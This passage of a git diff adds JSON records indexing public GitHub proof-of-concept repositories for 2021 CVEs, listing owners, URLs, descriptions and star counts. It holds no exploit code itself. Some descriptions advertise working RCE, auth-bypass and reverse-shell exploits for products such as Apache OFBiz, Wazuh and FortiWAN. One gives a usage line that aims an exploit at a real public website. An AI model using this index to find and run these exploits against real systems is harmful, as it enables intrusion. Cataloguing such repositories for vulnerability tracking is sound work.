+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-26102.json b/2021/CVE-2021-26102.json
new file mode 100644
index 0000000000..e5c21397eb
--- /dev/null
+++ b/2021/CVE-2021-26102.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 436616739,
+ "name": "CVE-2021-26102",
+ "full_name": "SleepyCofe\/CVE-2021-26102",
+ "owner": {
+ "login": "SleepyCofe",
+ "id": 95385010,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95385010?v=4",
+ "html_url": "https:\/\/github.com\/SleepyCofe"
+ },
+ "html_url": "https:\/\/github.com\/SleepyCofe\/CVE-2021-26102",
+ "description": "PoC of FortiWAN auth bypass (https:\/\/www.fortiguard.com\/psirt\/FG-IR-21-048)",
+ "fork": false,
+ "created_at": "2021-12-09T12:55:30Z",
+ "updated_at": "2023-03-14T02:14:06Z",
+ "pushed_at": "2022-01-20T14:53:49Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-26119.json b/2021/CVE-2021-26119.json
new file mode 100644
index 0000000000..2f2ac9a031
--- /dev/null
+++ b/2021/CVE-2021-26119.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 343119938,
+ "name": "CVE-2021-26119",
+ "full_name": "Udyz\/CVE-2021-26119",
+ "owner": {
+ "login": "Udyz",
+ "id": 39673284,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39673284?v=4",
+ "html_url": "https:\/\/github.com\/Udyz"
+ },
+ "html_url": "https:\/\/github.com\/Udyz\/CVE-2021-26119",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-02-28T14:05:23Z",
+ "updated_at": "2024-04-03T07:45:27Z",
+ "pushed_at": "2021-02-28T14:25:25Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 3
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-26121.json b/2021/CVE-2021-26121.json
new file mode 100644
index 0000000000..be57efb6e5
--- /dev/null
+++ b/2021/CVE-2021-26121.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 338405594,
+ "name": "CVE-2021-26121",
+ "full_name": "sourceincite\/CVE-2021-26121",
+ "owner": {
+ "login": "sourceincite",
+ "id": 13770985,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13770985?v=4",
+ "html_url": "https:\/\/github.com\/sourceincite"
+ },
+ "html_url": "https:\/\/github.com\/sourceincite\/CVE-2021-26121",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-02-12T18:53:37Z",
+ "updated_at": "2023-09-28T11:24:54Z",
+ "pushed_at": "2021-04-30T15:45:02Z",
+ "stargazers_count": 13,
+ "watchers_count": 13,
+ "has_discussions": false,
+ "forks_count": 8,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 8,
+ "watchers": 13,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-26258.json b/2021/CVE-2021-26258.json
new file mode 100644
index 0000000000..8806481ed1
--- /dev/null
+++ b/2021/CVE-2021-26258.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 579219511,
+ "name": "CVE-2021-26258",
+ "full_name": "zwclose\/CVE-2021-26258",
+ "owner": {
+ "login": "zwclose",
+ "id": 29465842,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29465842?v=4",
+ "html_url": "https:\/\/github.com\/zwclose"
+ },
+ "html_url": "https:\/\/github.com\/zwclose\/CVE-2021-26258",
+ "description": "Files and tools for CVE-2021-26258",
+ "fork": false,
+ "created_at": "2022-12-17T00:59:32Z",
+ "updated_at": "2022-12-24T08:39:43Z",
+ "pushed_at": "2022-12-18T03:14:54Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-26294.json b/2021/CVE-2021-26294.json
new file mode 100644
index 0000000000..56ae5ee031
--- /dev/null
+++ b/2021/CVE-2021-26294.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 424258180,
+ "name": "CVE-2021-26294",
+ "full_name": "dorkerdevil\/CVE-2021-26294",
+ "owner": {
+ "login": "dorkerdevil",
+ "id": 15796745,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15796745?v=4",
+ "html_url": "https:\/\/github.com\/dorkerdevil"
+ },
+ "html_url": "https:\/\/github.com\/dorkerdevil\/CVE-2021-26294",
+ "description": "Directory Traversal in Afterlogic webmail aurora and pro",
+ "fork": false,
+ "created_at": "2021-11-03T14:32:13Z",
+ "updated_at": "2023-09-28T11:32:56Z",
+ "pushed_at": "2022-07-17T17:25:24Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-26295.json b/2021/CVE-2021-26295.json
new file mode 100644
index 0000000000..8ffc215349
--- /dev/null
+++ b/2021/CVE-2021-26295.json
@@ -0,0 +1,182 @@
+[
+ {
+ "id": 350761950,
+ "name": "CVE-2021-26295",
+ "full_name": "yumusb\/CVE-2021-26295",
+ "owner": {
+ "login": "yumusb",
+ "id": 43062104,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43062104?v=4",
+ "html_url": "https:\/\/github.com\/yumusb"
+ },
+ "html_url": "https:\/\/github.com\/yumusb\/CVE-2021-26295",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-03-23T15:25:01Z",
+ "updated_at": "2023-09-28T11:26:05Z",
+ "pushed_at": "2021-04-01T10:38:18Z",
+ "stargazers_count": 24,
+ "watchers_count": 24,
+ "has_discussions": false,
+ "forks_count": 11,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 11,
+ "watchers": 24,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 351001241,
+ "name": "CVE-2021-26295-Apache-OFBiz",
+ "full_name": "rakjong\/CVE-2021-26295-Apache-OFBiz",
+ "owner": {
+ "login": "rakjong",
+ "id": 38517715,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38517715?v=4",
+ "html_url": "https:\/\/github.com\/rakjong"
+ },
+ "html_url": "https:\/\/github.com\/rakjong\/CVE-2021-26295-Apache-OFBiz",
+ "description": "CVE-2021-26295 Apache OFBiz rmi反序列化POC",
+ "fork": false,
+ "created_at": "2021-03-24T08:25:04Z",
+ "updated_at": "2022-01-13T12:15:38Z",
+ "pushed_at": "2021-03-24T09:01:11Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 351367125,
+ "name": "CVE-2021-26295",
+ "full_name": "dskho\/CVE-2021-26295",
+ "owner": {
+ "login": "dskho",
+ "id": 32945923,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32945923?v=4",
+ "html_url": "https:\/\/github.com\/dskho"
+ },
+ "html_url": "https:\/\/github.com\/dskho\/CVE-2021-26295",
+ "description": "CVE-2021-26295 EXP 可成功反弹Shell",
+ "fork": false,
+ "created_at": "2021-03-25T08:50:10Z",
+ "updated_at": "2023-11-18T03:10:57Z",
+ "pushed_at": "2021-03-25T02:55:27Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 15,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 15,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 356332111,
+ "name": "CVE-2021-26295--",
+ "full_name": "coolyin001\/CVE-2021-26295--",
+ "owner": {
+ "login": "coolyin001",
+ "id": 82075508,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82075508?v=4",
+ "html_url": "https:\/\/github.com\/coolyin001"
+ },
+ "html_url": "https:\/\/github.com\/coolyin001\/CVE-2021-26295--",
+ "description": "CVE-2021-26295-POC 利用DNSlog进行CVE-2021-26295的漏洞验证。 使用 poc:将目标放于target.txt后运行python poc.py即可。(Jdk环境需<12,否则ysoserial无法正常生成有效载荷) exp:python exp.py https:\/\/baidu.com然后进入命令执行界面(无回显)",
+ "fork": false,
+ "created_at": "2021-04-09T16:20:18Z",
+ "updated_at": "2021-04-09T16:20:21Z",
+ "pushed_at": "2021-04-09T16:22:14Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 357860150,
+ "name": "CVE-2021-26295-Apache-OFBiz-EXP",
+ "full_name": "S0por\/CVE-2021-26295-Apache-OFBiz-EXP",
+ "owner": {
+ "login": "S0por",
+ "id": 82497394,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82497394?v=4",
+ "html_url": "https:\/\/github.com\/S0por"
+ },
+ "html_url": "https:\/\/github.com\/S0por\/CVE-2021-26295-Apache-OFBiz-EXP",
+ "description": "Apache OFBiz rmi反序列化EXP(CVE-2021-26295)",
+ "fork": false,
+ "created_at": "2021-04-14T10:10:40Z",
+ "updated_at": "2022-11-09T18:11:54Z",
+ "pushed_at": "2021-04-20T02:41:49Z",
+ "stargazers_count": 15,
+ "watchers_count": 15,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 15,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 367057442,
+ "name": "ofbiz-poc",
+ "full_name": "yuaneuro\/ofbiz-poc",
+ "owner": {
+ "login": "yuaneuro",
+ "id": 42265015,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42265015?v=4",
+ "html_url": "https:\/\/github.com\/yuaneuro"
+ },
+ "html_url": "https:\/\/github.com\/yuaneuro\/ofbiz-poc",
+ "description": "CVE-2020-9496和CVE-2021-26295利用dnslog批量验证漏洞poc及exp",
+ "fork": false,
+ "created_at": "2021-05-13T13:28:15Z",
+ "updated_at": "2023-09-28T11:27:38Z",
+ "pushed_at": "2021-05-13T13:53:50Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-26411.json b/2021/CVE-2021-26411.json
new file mode 100644
index 0000000000..829c695b4d
--- /dev/null
+++ b/2021/CVE-2021-26411.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 430701138,
+ "name": "CVE-2021-26411",
+ "full_name": "CrackerCat\/CVE-2021-26411",
+ "owner": {
+ "login": "CrackerCat",
+ "id": 17995064,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17995064?v=4",
+ "html_url": "https:\/\/github.com\/CrackerCat"
+ },
+ "html_url": "https:\/\/github.com\/CrackerCat\/CVE-2021-26411",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-11-22T12:40:10Z",
+ "updated_at": "2024-01-07T22:48:02Z",
+ "pushed_at": "2021-11-18T08:33:05Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-26414.json b/2021/CVE-2021-26414.json
new file mode 100644
index 0000000000..1f503498f3
--- /dev/null
+++ b/2021/CVE-2021-26414.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 557378926,
+ "name": "dcom_10036_Solver",
+ "full_name": "Nels2\/dcom_10036_Solver",
+ "owner": {
+ "login": "Nels2",
+ "id": 55712980,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55712980?v=4",
+ "html_url": "https:\/\/github.com\/Nels2"
+ },
+ "html_url": "https:\/\/github.com\/Nels2\/dcom_10036_Solver",
+ "description": "This script was created to automate addressing the vulnerability described in CVE-2021-26414 (https:\/\/support.microsoft.com\/en-us\/topic\/kb5004442-manage-changes-for-windows-dcom-server-security-feature-bypass-cve-2021-26414-f1400b52-c141-43d2-941e-37ed901c769c), adds two regkeys under HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Ole\\AppCompa",
+ "fork": false,
+ "created_at": "2022-10-25T15:24:03Z",
+ "updated_at": "2022-10-25T15:25:33Z",
+ "pushed_at": "2022-10-25T15:28:37Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-26415.json b/2021/CVE-2021-26415.json
new file mode 100644
index 0000000000..d24d98eae7
--- /dev/null
+++ b/2021/CVE-2021-26415.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 360537622,
+ "name": "CVE-2021-26415",
+ "full_name": "adenkiewicz\/CVE-2021-26415",
+ "owner": {
+ "login": "adenkiewicz",
+ "id": 1060275,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1060275?v=4",
+ "html_url": "https:\/\/github.com\/adenkiewicz"
+ },
+ "html_url": "https:\/\/github.com\/adenkiewicz\/CVE-2021-26415",
+ "description": "All files needed to reproduce PoC for CVE-2021-26415: https:\/\/www.cloaked.pl\/2021\/04\/cve-2021-26415\/",
+ "fork": false,
+ "created_at": "2021-04-22T13:55:40Z",
+ "updated_at": "2022-03-11T02:42:26Z",
+ "pushed_at": "2021-04-22T14:04:46Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-26690.json b/2021/CVE-2021-26690.json
new file mode 100644
index 0000000000..466a670fb3
--- /dev/null
+++ b/2021/CVE-2021-26690.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 386164563,
+ "name": "CVE-2021-26690",
+ "full_name": "dja2TaqkGEEfA45\/CVE-2021-26690",
+ "owner": {
+ "login": "dja2TaqkGEEfA45",
+ "id": 82131630,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82131630?v=4",
+ "html_url": "https:\/\/github.com\/dja2TaqkGEEfA45"
+ },
+ "html_url": "https:\/\/github.com\/dja2TaqkGEEfA45\/CVE-2021-26690",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-07-15T04:38:43Z",
+ "updated_at": "2021-07-15T04:38:43Z",
+ "pushed_at": "2021-07-15T04:38:44Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-26691.json b/2021/CVE-2021-26691.json
new file mode 100644
index 0000000000..f52327d1f5
--- /dev/null
+++ b/2021/CVE-2021-26691.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 386164410,
+ "name": "CVE-2021-26691",
+ "full_name": "dja2TaqkGEEfA45\/CVE-2021-26691",
+ "owner": {
+ "login": "dja2TaqkGEEfA45",
+ "id": 82131630,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82131630?v=4",
+ "html_url": "https:\/\/github.com\/dja2TaqkGEEfA45"
+ },
+ "html_url": "https:\/\/github.com\/dja2TaqkGEEfA45\/CVE-2021-26691",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-07-15T04:37:58Z",
+ "updated_at": "2021-07-15T04:37:58Z",
+ "pushed_at": "2021-07-15T04:37:59Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-26700.json b/2021/CVE-2021-26700.json
new file mode 100644
index 0000000000..91be57bfd9
--- /dev/null
+++ b/2021/CVE-2021-26700.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 338818030,
+ "name": "CVE-2021-26700",
+ "full_name": "jackadamson\/CVE-2021-26700",
+ "owner": {
+ "login": "jackadamson",
+ "id": 7891953,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7891953?v=4",
+ "html_url": "https:\/\/github.com\/jackadamson"
+ },
+ "html_url": "https:\/\/github.com\/jackadamson\/CVE-2021-26700",
+ "description": "RCE in NPM VSCode Extension",
+ "fork": false,
+ "created_at": "2021-02-14T14:01:04Z",
+ "updated_at": "2022-10-18T06:03:27Z",
+ "pushed_at": "2021-04-11T13:45:11Z",
+ "stargazers_count": 20,
+ "watchers_count": 20,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 20,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 614903179,
+ "name": "CVE-2021-26700",
+ "full_name": "june-in-exile\/CVE-2021-26700",
+ "owner": {
+ "login": "june-in-exile",
+ "id": 26154393,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26154393?v=4",
+ "html_url": "https:\/\/github.com\/june-in-exile"
+ },
+ "html_url": "https:\/\/github.com\/june-in-exile\/CVE-2021-26700",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-03-16T14:49:28Z",
+ "updated_at": "2023-05-17T19:19:18Z",
+ "pushed_at": "2023-05-17T20:46:09Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-26708.json b/2021/CVE-2021-26708.json
new file mode 100644
index 0000000000..3919471259
--- /dev/null
+++ b/2021/CVE-2021-26708.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 339197991,
+ "name": "vsock_poc",
+ "full_name": "jordan9001\/vsock_poc",
+ "owner": {
+ "login": "jordan9001",
+ "id": 10539462,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10539462?v=4",
+ "html_url": "https:\/\/github.com\/jordan9001"
+ },
+ "html_url": "https:\/\/github.com\/jordan9001\/vsock_poc",
+ "description": "Investigating the bug behind CVE-2021-26708",
+ "fork": false,
+ "created_at": "2021-02-15T20:27:06Z",
+ "updated_at": "2024-01-16T16:26:57Z",
+ "pushed_at": "2021-02-16T03:03:54Z",
+ "stargazers_count": 25,
+ "watchers_count": 25,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 25,
+ "score": 0,
+ "subscribers_count": 5
+ },
+ {
+ "id": 347897537,
+ "name": "CVE-2021-26708",
+ "full_name": "azpema\/CVE-2021-26708",
+ "owner": {
+ "login": "azpema",
+ "id": 43499244,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43499244?v=4",
+ "html_url": "https:\/\/github.com\/azpema"
+ },
+ "html_url": "https:\/\/github.com\/azpema\/CVE-2021-26708",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-03-15T08:52:54Z",
+ "updated_at": "2022-01-14T12:06:51Z",
+ "pushed_at": "2021-06-12T14:22:54Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-26714.json b/2021/CVE-2021-26714.json
new file mode 100644
index 0000000000..d39a44a587
--- /dev/null
+++ b/2021/CVE-2021-26714.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 375060087,
+ "name": "CVE-2021-26714",
+ "full_name": "PwCNO-CTO\/CVE-2021-26714",
+ "owner": {
+ "login": "PwCNO-CTO",
+ "id": 58770486,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58770486?v=4",
+ "html_url": "https:\/\/github.com\/PwCNO-CTO"
+ },
+ "html_url": "https:\/\/github.com\/PwCNO-CTO\/CVE-2021-26714",
+ "description": "Directory Traversal vulnerability in Enterprise License Manager portal in Mitel MiContact Center Enterprise before 9.4",
+ "fork": false,
+ "created_at": "2021-06-08T15:33:51Z",
+ "updated_at": "2021-06-08T15:34:26Z",
+ "pushed_at": "2021-06-08T15:34:22Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-26814.json b/2021/CVE-2021-26814.json
new file mode 100644
index 0000000000..e550e1f371
--- /dev/null
+++ b/2021/CVE-2021-26814.json
@@ -0,0 +1,95 @@
+[
+ {
+ "id": 368141608,
+ "name": "CVE-2021-26814",
+ "full_name": "WickdDavid\/CVE-2021-26814",
+ "owner": {
+ "login": "WickdDavid",
+ "id": 18442485,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18442485?v=4",
+ "html_url": "https:\/\/github.com\/WickdDavid"
+ },
+ "html_url": "https:\/\/github.com\/WickdDavid\/CVE-2021-26814",
+ "description": "A simple python PoC to exploit CVE-2021-26814 and gain RCE on Wazuh Manager (v.4.0.0-4.0.3) through the API service.",
+ "fork": false,
+ "created_at": "2021-05-17T10:13:47Z",
+ "updated_at": "2023-09-28T11:27:44Z",
+ "pushed_at": "2021-05-18T15:15:40Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 368546138,
+ "name": "CVE-2021-26814",
+ "full_name": "CYS4srl\/CVE-2021-26814",
+ "owner": {
+ "login": "CYS4srl",
+ "id": 72195371,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72195371?v=4",
+ "html_url": "https:\/\/github.com\/CYS4srl"
+ },
+ "html_url": "https:\/\/github.com\/CYS4srl\/CVE-2021-26814",
+ "description": "PoC of CVE-2021-26814",
+ "fork": false,
+ "created_at": "2021-05-18T13:45:47Z",
+ "updated_at": "2021-09-12T05:15:35Z",
+ "pushed_at": "2021-05-18T15:13:16Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 384737658,
+ "name": "Internet-Security-Project---CVE-2021-26814",
+ "full_name": "paolorabbito\/Internet-Security-Project---CVE-2021-26814",
+ "owner": {
+ "login": "paolorabbito",
+ "id": 47228598,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47228598?v=4",
+ "html_url": "https:\/\/github.com\/paolorabbito"
+ },
+ "html_url": "https:\/\/github.com\/paolorabbito\/Internet-Security-Project---CVE-2021-26814",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-07-10T16:04:28Z",
+ "updated_at": "2021-12-03T14:48:22Z",
+ "pushed_at": "2021-12-03T14:48:19Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "security"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-26828.json b/2021/CVE-2021-26828.json
new file mode 100644
index 0000000000..31ae436767
--- /dev/null
+++ b/2021/CVE-2021-26828.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 353202709,
+ "name": "CVE-2021-26828_ScadaBR_RCE",
+ "full_name": "hev0x\/CVE-2021-26828_ScadaBR_RCE",
+ "owner": {
+ "login": "hev0x",
+ "id": 6265911,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6265911?v=4",
+ "html_url": "https:\/\/github.com\/hev0x"
+ },
+ "html_url": "https:\/\/github.com\/hev0x\/CVE-2021-26828_ScadaBR_RCE",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-03-31T02:39:02Z",
+ "updated_at": "2023-09-28T11:26:19Z",
+ "pushed_at": "2021-06-11T03:53:22Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-26832.json b/2021/CVE-2021-26832.json
new file mode 100644
index 0000000000..4c019eda7c
--- /dev/null
+++ b/2021/CVE-2021-26832.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 357423084,
+ "name": "CVE-2021-26832",
+ "full_name": "NagliNagli\/CVE-2021-26832",
+ "owner": {
+ "login": "NagliNagli",
+ "id": 35578316,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35578316?v=4",
+ "html_url": "https:\/\/github.com\/NagliNagli"
+ },
+ "html_url": "https:\/\/github.com\/NagliNagli\/CVE-2021-26832",
+ "description": "Cross Site Scripting (XSS) at the \"Reset Password\" page form of Priority Enterprise Management System v8.00 allows attackers to execute javascript on behalf of the victim by sending a malicious URL or directing the victim to a malicious site.",
+ "fork": false,
+ "created_at": "2021-04-13T04:25:31Z",
+ "updated_at": "2024-02-03T07:32:10Z",
+ "pushed_at": "2021-04-13T04:26:25Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-26855.json b/2021/CVE-2021-26855.json
new file mode 100644
index 0000000000..87af4c02d2
--- /dev/null
+++ b/2021/CVE-2021-26855.json
@@ -0,0 +1,1462 @@
+[
+ {
+ "id": 344161221,
